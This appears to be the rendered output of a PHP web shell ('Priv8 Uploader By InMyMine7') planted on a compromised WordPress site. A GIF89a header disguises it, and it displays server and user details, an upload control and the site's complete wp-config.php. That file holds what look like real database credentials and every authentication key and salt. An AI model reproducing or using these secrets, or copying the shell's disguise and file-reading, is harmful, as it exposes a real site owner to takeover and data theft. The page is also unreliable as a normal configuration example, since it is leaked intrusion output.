GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/public_html/wp-config.php
<?php

/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'bs3263_wpressq');

/** MySQL database username */
define('DB_USER', 'bs3263_wpressq1');

/** MySQL database password */
define('DB_PASSWORD', 'nUb0nhVw');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');


/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'b-N73JQspmRv{mJlkhsE]Xo(HR}p^+qU5w+_p:k2Gpd@I{>W@AR-(=xzW8mIK#41');
define('SECURE_AUTH_KEY',  '5m _j]hpG6yEnC)loEHLO|<t->oXlg)%]{FN1@Unp/4QrjYnqj:@pux{3-L*S{{j');
define('LOGGED_IN_KEY',    'pC^qkL/%6W2,bYg8<(rluqUW0Fu~dt]4:<ZV>50632nV}I!kd[t:JTmXc<-JsK*X');
define('NONCE_KEY',        'tg[P+h]LS~%zW2j9PC4uNG)wB+kPRdkP-Y+u*j^)(2:T]aLSr}If[;JR|zo;$UzN');
define('AUTH_SALT',        'M3MNGyb&}>DV&bnDVTWA1W!2/{} rA#%y_:iB}yL%?I8{a1kf!zrg(L;b^H[vTV(');
define('SECURE_AUTH_SALT', 'D 84o:RTdPv_ZV];3 8ad&W%pnWt$RV<rEyCrEfK-SQv2CM?-CPM<_dm;JX>&n2v');
define('LOGGED_IN_SALT',   ',fN3-~-Iz`kb)J1iJ&u  ,vQ`MT8w1Yf|=&b~LH!=CFe$j63XiqoRG:>H~IPJ[il');
define('NONCE_SALT',       'Z:irE)4?2(I]$sxQHR,eU{vvobz@vJ~@EI5)5 7vlM?~Uz:TMK[)M$-D0B/Dp`Nr');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'poolq_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', true);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');